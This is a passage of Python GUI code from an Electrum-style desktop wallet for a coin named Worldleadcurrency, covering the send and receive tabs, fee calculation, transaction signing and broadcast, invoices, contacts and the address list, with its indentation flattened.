self.new_request_button.setEnabled(True)
def update_receive_tab(self):
# hide receive tab if no receive requests available
b = len(self.wallet.receive_requests) > 0
self.receive_list.setVisible(b)
self.receive_requests_label.setVisible(b)
if not b:
self.expires_label.hide()
self.expires_combo.show()
# check if it is necessary to show the account
self.receive_list.setColumnHidden(1, len(self.wallet.get_accounts()) == 1)
# update the receive address if necessary
current_address = self.receive_address_e.text()
domain = self.wallet.get_account_addresses(self.current_account, include_change=False)
addr = self.wallet.get_unused_address(self.current_account)
if not current_address in domain and addr:
self.set_receive_address(addr)
self.new_request_button.setEnabled(addr != current_address)
# clear the list and fill it again
self.receive_list.clear()
for req in self.wallet.get_sorted_requests(self.config):
address = req['address']
if address not in domain:
continue
timestamp = req.get('time', 0)
amount = req.get('amount')
expiration = req.get('exp', None)
message = req.get('memo', '')
date = format_time(timestamp)
status = req.get('status')
signature = req.get('sig')
requestor = req.get('name', '')
amount_str = self.format_amount(amount) if amount else ""
account = ''
item = QTreeWidgetItem([date, account, address, '', message, amount_str, pr_tooltips.get(status,'')])
if signature is not None:
item.setIcon(3, QIcon(":icons/seal.png"))
item.setToolTip(3, 'signed by '+ requestor)
if status is not PR_UNKNOWN:
item.setIcon(6, QIcon(pr_icons.get(status)))
self.receive_list.addTopLevelItem(item)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def show_before_broadcast(self):
return self.config.get('show_before_broadcast', False)
def set_show_before_broadcast(self, show):
self.config.set_key('show_before_broadcast', bool(show))
self.set_send_button_text()
def set_send_button_text(self):
if self.show_before_broadcast():
text = _("Send...")
elif self.wallet and self.wallet.is_watching_only():
text = _("Send...")
else:
text = _("Send")
self.send_button.setText(text)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Worldleadcurrency address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Worldleadcurrency address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
msg = _('Worldleadcurrency transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_e, 5, 1)
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.send_button)
buttons.addWidget(self.clear_button)
grid.addLayout(buttons, 6, 1, 1, 2)
def on_shortcut():
inputs = self.get_coins()
sendable = sum(map(lambda x:x['value'], inputs))
fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
addr = self.get_payto_or_dummy()
amount, fee = self.wallet.get_max_amount(self.config, inputs, addr, fee)
if not self.fee_e.isModified():
self.fee_e.setAmount(fee)
self.amount_e.setAmount(amount)
self.not_enough_funds = (fee + amount > sendable)
# emit signal for fiat_amount update
self.amount_e.textEdited.emit("")
self.amount_e.shortcut.connect(on_shortcut)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
self.invoices_list = MyTreeWidget(self, self.invoices_list_menu,
[_('Expires'), _('Requestor'), _('Description'), _('Amount'), _('Status')], 2)
self.invoices_list.setSortingEnabled(True)
self.invoices_list.header().setResizeMode(1, QHeaderView.Interactive)
self.invoices_list.setColumnWidth(1, 200)
self.invoices_list.on_update = self.update_invoices_list
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoices_list)
vbox.setStretchFactor(self.invoices_list, 1000)
# Defer this until grid is parented to avoid ugly flash during startup
self.update_fee_edit()
run_hook('create_send_tab', grid)
return w
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
return self.payto_e.payto_address if self.payto_e.payto_address else self.wallet.dummy_address()
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs()
if not outputs:
addr = self.get_payto_or_dummy()
outputs = [(TYPE_ADDRESS, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('can_edit_fees', False)
self.fee_e.setVisible(b)
self.fee_e_label.setVisible(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain, height=self.network.get_local_height())
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, value = self.contacts.get(key)
return key + ' <' + value + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.use_encryption:
password = self.password_dialog(parent=parent)
try:
if password:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs()
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Worldleadcurrency Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Worldleadcurrency Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee = self.fee_e.get_amount()
if fee is None:
self.show_error(_('Invalid Fee'))
return
coins = self.get_coins()
return outputs, fee, label, coins
def do_send(self):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
if tx.get_fee() < self.wallet.relayfee() and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if self.show_before_broadcast():
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.use_encryption:
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
if self.wallet.use_encryption and not password:
callback(False) # User cancelled password input
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
pr.set_paid(tx.hash())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
        # Capture the current top-level window; the override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.hash(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoices_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
dialog.exec_()
return clayout.selected_index()
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoices_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(unicode(URI), self.on_pr)
except BaseException as e:
self.show_error(_('Invalid worldleadcurrency URI:') + '\n' + str(e))
return
self.tabs.setCurrentIndex(1)
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
l = MyTreeWidget(self, self.create_receive_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.on_update = self.update_address_tab
self.address_list = l
return self.create_list_tab(l)
def create_contacts_tab(self):
l = MyTreeWidget(self, self.create_contact_menu, [_('Name'), _('Value'), _('Type')], 1, [0, 1])
l.setSelectionMode(QAbstractItemView.ExtendedSelection)
l.setSortingEnabled(True)
l.on_edited = self.on_contact_edited
l.on_permit_edit = self.on_permit_contact_edit
l.on_update = self.update_contacts_tab
self.contacts_list = l
return self.create_list_tab(l)
def update_invoices_list(self):
inv_list = self.invoices.sorted_list()
l = self.invoices_list
l.clear()
for pr in inv_list:
key = pr.get_id()
status = self.invoices.get_status(key)
requestor = pr.get_requestor()
exp = pr.get_expiration_date()
date_str = util.format_time(exp) if exp else _('Never')
item = QTreeWidgetItem([date_str, requestor, pr.memo, self.format_amount(pr.get_amount(), whitespaces=True), pr_tooltips.get(status,'')])
item.setIcon(4, QIcon(pr_icons.get(status)))
item.setData(0, Qt.UserRole, key)
item.setFont(1, QFont(MONOSPACE_FONT))
item.setFont(3, QFont(MONOSPACE_FONT))
l.addTopLevelItem(item)
l.setCurrentItem(l.topLevelItem(0))
self.invoices_list.setVisible(len(inv_list))
self.invoices_label.setVisible(len(inv_list))
def delete_imported_key(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_imported_key(addr)
self.address_list.update()
self.history_list.update()
def edit_account_label(self, k):
text, ok = QInputDialog.getText(self, _('Rename account'), _('Name') + ':', text = self.wallet.labels.get(k,''))
if ok:
label = unicode(text)
self.wallet.set_label(k,label)
self.address_list.update()
def account_set_expanded(self, item, k, b):
item.setExpanded(b)
self.accounts_expanded[k] = b
def create_account_menu(self, position, k, item):
menu = QMenu()
exp = item.isExpanded()
menu.addAction(_("Minimize") if exp else _("Maximize"), lambda: self.account_set_expanded(item, k, not exp))
menu.addAction(_("Rename"), lambda: self.edit_account_label(k))
if self.wallet.seed_version > 4:
menu.addAction(_("View details"), lambda: self.show_account_details(k))
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def create_receive_menu(self, position):
selected = self.address_list.selectedItems()
multi_select = len(selected) > 1
addrs = [unicode(item.text(0)) for item in selected]
if not multi_select:
item = self.address_list.itemAt(position)
if not item:
return
addr = addrs[0]
if not is_valid(addr):
k = str(item.data(0,32).toString())
if k:
self.create_account_menu(position, k, item)
else:
item.setExpanded(not item.isExpanded())
return
menu = QMenu()
if not multi_select:
menu.addAction(_("Copy to clipboard"), lambda: self.app.clipboard().setText(addr))
menu.addAction(_("Request payment"), lambda: self.receive_at(addr))
menu.addAction(_("Edit label"), lambda: self.address_list.editItem(item, self.address_list.editable_columns[0]))
menu.addAction(_('History'), lambda: self.show_address(addr))
menu.addAction(_('Public Keys'), lambda: self.show_public_keys(addr))
if self.wallet.can_export():
menu.addAction(_("Private key"), lambda: self.show_private_key(addr))
if not self.wallet.is_watching_only():
menu.addAction(_("Sign/verify message"), lambda: self.sign_verify_message(addr))
menu.addAction(_("Encrypt/decrypt message"), lambda: self.encrypt_message(addr))
if self.wallet.is_imported(addr):
menu.addAction(_("Remove from wallet"), lambda: self.delete_imported_key(addr))
addr_URL = block_explorer_URL(self.config, 'addr', addr)
if addr_URL:
menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
if any(not self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Freeze"), lambda: self.set_frozen_state(addrs, True))
if any(self.wallet.is_frozen(addr) for addr in addrs):
menu.addAction(_("Unfreeze"), lambda: self.set_frozen_state(addrs, False))
def can_send(addr):
return not self.wallet.is_frozen(addr) and sum(self.wallet.get_addr_balance(addr)[:2])
if any(can_send(addr) for addr in addrs):
menu.addAction(_("Send From"), lambda: self.send_from_addresses(addrs))
run_hook('receive_menu', menu, addrs, self.wallet)
menu.exec_(self.address_list.viewport().mapToGlobal(position))
def get_coins(self):
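        # Use the inputs manually selected via 'Send From' if any were set;
        # otherwise fall back to all spendable coins of the current account.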
if self.pay_from:
return self.pay_from
else:
domain = self.wallet.get_account_addresses(self.current_account)
return self.wallet.get_spendable_coins(domain, height=self.network.get_local_height())
def send_from_addresses(self, addrs):
self.set_pay_from(addrs)
self.tabs.setCurrentIndex(1)
self.update_fee()
def paytomany(self):
self.tabs.setCurrentIndex(1)
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.tabs.setCurrentIndex(1)
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def on_permit_contact_edit(self, item, column):
# openalias items shouldn't be editable
return item.text(2) != "openalias"
def on_contact_edited(self, item, column, prior):
if column == 0: # Remove old contact if renamed
self.contacts.pop(prior)
self.set_contact(unicode(item.text(0)), unicode(item.text(1)))
def set_contact(self, label, address):
if not is_valid(address):
self.show_error(_('Invalid Address'))
self.contacts_list.update() # Displays original unchanged value
return False
self.contacts[label] = ('address', address)
self.contacts_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contacts_list.update()
self.update_completions()
def create_contact_menu(self, position):
menu = QMenu()
selected = self.contacts_list.selectedItems()
if not selected:
menu.addAction(_("New contact"), lambda: self.new_contact_dialog())
else:
labels = [unicode(item.text(0)) for item in selected]
addrs = [unicode(item.text(1)) for item in selected]
types = [unicode(item.text(2)) for item in selected]
menu.addAction(_("Copy to Clipboard"), lambda:
self.app.clipboard().setText('\n'.join(labels)))
menu.addAction(_("Pay to"), lambda: self.payto_contacts(labels))
menu.addAction(_("Delete"), lambda: self.delete_contacts(labels))
URLs = []
for (addr, _type) in zip(addrs, types):
if _type == 'address':
URLs.append(block_explorer_URL(self.config, 'addr', addr))
if URLs:
menu.addAction(_("View on block explorer"),
lambda: map(webbrowser.open, URLs))
run_hook('create_contact_menu', menu, selected)
menu.exec_(self.contacts_list.viewport().mapToGlobal(position))
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Expires") + ':'), 1, 0)
grid.addWidget(QLabel(format_time(pr.get_expiration_date())), 1, 1)
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
grid.addWidget(QLabel(_("Payment URL") + ':'), 4, 0)
grid.addWidget(QLabel(pr.payment_url), 4, 1)
grid.addWidget(QLabel(_("Outputs") + ':'), 5, 0)
outputs_str = '\n'.join(map(lambda x: x[1] + ' ' + self.format_amount(x[2])+ self.base_unit(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 5, 1)
if pr.tx:
grid.addWidget(QLabel(_("Transaction ID") + ':'), 6, 0)
l = QLineEdit(pr.tx)
l.setReadOnly(True)
grid.addWidget(l, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
return
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def invoices_list_menu(self, position):
item = self.invoices_list.itemAt(position)
if not item:
return
key = str(item.data(0, 32).toString())
pr = self.invoices.get(key)
status = self.invoices.get_status(key)
menu = QMenu()
menu.addAction(_("Details"), lambda: self.show_invoice(key))
if status == PR_UNPAID:
menu.addAction(_("Pay Now"), lambda: self.do_pay_invoice(key))
def delete_invoice(key):
self.invoices.remove(key)
self.invoices_list.update()
menu.addAction(_("Delete"), lambda: delete_invoice(key))
menu.exec_(self.invoices_list.viewport().mapToGlobal(position))
def update_address_tab(self):
l = self.address_list
item = l.currentItem()
current_address = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
accounts = self.wallet.get_accounts()
if self.current_account is None:
account_items = sorted(accounts.items())
else:
account_items = [(self.current_account, accounts.get(self.current_account))]
for k, account in account_items:
if len(accounts) > 1:
name = self.wallet.get_account_name(k)
c, u, x = self.wallet.get_account_balance(k)
account_item = QTreeWidgetItem([ name, '', self.format_amount(c + u + x), ''])
account_item.setExpanded(self.accounts_expanded.get(k, True))
account_item.setData(0, Qt.UserRole, k)
l.addTopLevelItem(account_item)
else:
account_item = l
sequences = [0,1] if account.has_change() else [0]
for is_change in sequences:
if len(sequences) > 1:
name = _("Receiving") if not is_change else _("Change")
seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
account_item.addChild(seq_item)
if not is_change:
seq_item.setExpanded(True)
else:
seq_item = account_item
used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
used_flag = False
addr_list = account.get_addresses(is_change)
for address in addr_list:
num = len(self.wallet.history.get(address,[]))
is_used = self.wallet.is_used(address)
label = self.wallet.labels.get(address,'')
c, u, x = self.wallet.get_addr_balance(address)
balance = self.format_amount(c + u + x)
item = QTreeWidgetItem([address, label, balance, "%d"%num])
item.setFont(0, QFont(MONOSPACE_FONT))
item.setData(0, Qt.UserRole, address)
item.setData(0, Qt.UserRole+1, True) # label can be edited
if self.wallet.is_frozen(address):
item.setBackgroundColor(0, QColor('lightblue'))
if self.wallet.is_beyond_limit(address, account, is_change):
item.setBackgroundColor(0, QColor('red'))
if is_used:
if not used_flag:
seq_item.insertChild(0, used_item)
used_flag = True
used_item.addChild(item)
else:
seq_item.addChild(item)
if address == current_address:
l.setCurrentItem(item)
def update_contacts_tab(self):
l = self.contacts_list
item = l.currentItem()
current_key = item.data(0, Qt.UserRole).toString() if item else None
l.clear()
for key in sorted(self.contacts.keys()):
_type, value = self.contacts[key]
item = QTreeWidgetItem([key, value, _type])
item.setData(0, Qt.UserRole, key)
l.addTopLevelItem(item)
if key == current_key:
l.setCurrentItem(item)
run_hook('update_contacts_tab', l)
def create_console_tab(self):
from console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
            return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def change_account(self,s):
if s == _("All accounts"):
self.current_account = None
else:
accounts = self.wallet.get_account_names()
for k, v in accounts.items():
if v == s:
self.current_account = k
self.history_list.update()
self.update_status()
self.address_list.update()
self.receive_list.update()
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.account_selector = QComboBox()
self.account_selector.setSizeAdjustPolicy(QComboBox.AdjustToContents)
self.connect(self.account_selector, SIGNAL("activated(QString)"), self.change_account)
sb.addPermanentWidget(self.account_selector)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), self.run_network_dialog )
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.use_encryption else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.set_send_button_text()
def change_password_dialog(self):
from password_dialog import PasswordDialog, PW_CHANGE
msg = (_('Your wallet is encrypted. Use this dialog to change your '
'password. To disable wallet encryption, enter an empty new '
'password.') if self.wallet.use_encryption
else _('Your wallet keys are not encrypted'))
d = PasswordDialog(self, self.wallet, msg, PW_CHANGE)
ok, password, new_password = d.run()
if not ok:
return
try:
self.wallet.check_password(password)
except BaseException as e:
self.show_error(str(e))
return
try:
self.wallet.update_password(password, new_password)
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
if new_password:
msg = _('Password was updated successfully')
else:
msg = _('This wallet is not encrypted')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
i = self.tabs.currentIndex()
if i == 0:
self.history_list.filter(t, [2, 3, 4]) # Date, Description, Amount
elif i == 1:
self.invoices_list.filter(t, [0, 1, 2, 3]) # Date, Requestor, Description, Amount
elif i == 2:
